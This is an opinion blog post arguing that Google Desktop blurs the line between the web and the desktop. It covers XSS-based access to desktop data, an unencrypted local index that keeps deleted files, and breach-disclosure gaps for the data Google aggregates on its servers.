Without scrutiny, highly usable software that neglects security can seem heroic and revolutionary. Such may be the case for Google Desktop. Most users see the web-meets-desktop search capabilities and don't consider the security implications of making the boundary between google.com and the desktop so seductively porous.
Particularly troubling is the potential for an attacker to access information, documents, and possibly executables through Google Desktop via flaws (XSS in particular) in Google’s website. In February Yair Amit et. al. found a vulnerability that could allow remote attackers access to data and functionality through Google Desktop. Rsnake has also pointed out some existing Google XSS vulnerabilities on his blog at ha.ckers.org .
Also, consider that Google Desktop keeps a fairly sizable index and cache for rapid search that by default is unencrypted. This index contains an amazing amount of historical data: It retains previous versions of files, web-based email communications, browsing history, etc. The problem is that this data persists even after reasonable efforts of the average user to delete it from the file system. Tools that purge files when they are deleted (and overwrite them several times) that are popular within corporations and government agencies for example have no effect on Google’s index and cache of those files. This represents a sizable risk because it means that Google Desktop may completely obviate some corporate and governmental procedures for purging data.
The privacy issues listed above assume that everything works as intended. A greater concern may be the aggregation point of sensitive data created on Google’s servers. Consumers have seen many breaches at data warehouses over the last few years (CardSystems, TJX, etc.) that one wonders how many financially-driven attackers will soon become incentivized to turn their sights on Google. One could only imagine that the combined Google/DoubleClick data pool would contain enough “big brother” data to have made George Orwell salivate. Perhaps most interesting is that much of the data housed by Google (such as search history, etc.) isn’t covered under many disclosure laws (such as California Senate Bill 1386). This means that, depending on the breach, Google may be under no obligation to inform the public. Privacy International, a UK consumer protection group, came down particularly hard on them in their privacy assessment putting them 23rd out of 23 companies studied. They went so far as to say “While a number of companies share some of these negative elements, none comes close to achieving status as an endemic threat to privacy.”All of this means that Google has a big security burden to bear which is becoming increasingly cumbersome as their success grows. Google has a track record of building cool products that people love to use but they also have an ethical responsibility to match their ambition in features with security. If ethics don’t win out, change may come at a higher price through regulation and shaken consumer confidence. Here are a few open questions that need answers: How is information provided to Google pushed out to partners, advertisers, and the public? What security mechanisms are in place to protect aggregated data on servers from vulnerabilities (this goes beyond masking the identity of the person whose behavior is tracked and speaks to the behavior data itself)? What is Google’s policy for disclosing a breach of any search/behavior data that isn’t covered by current (and narrow) breach disclosure legislation?
Original Post h3r3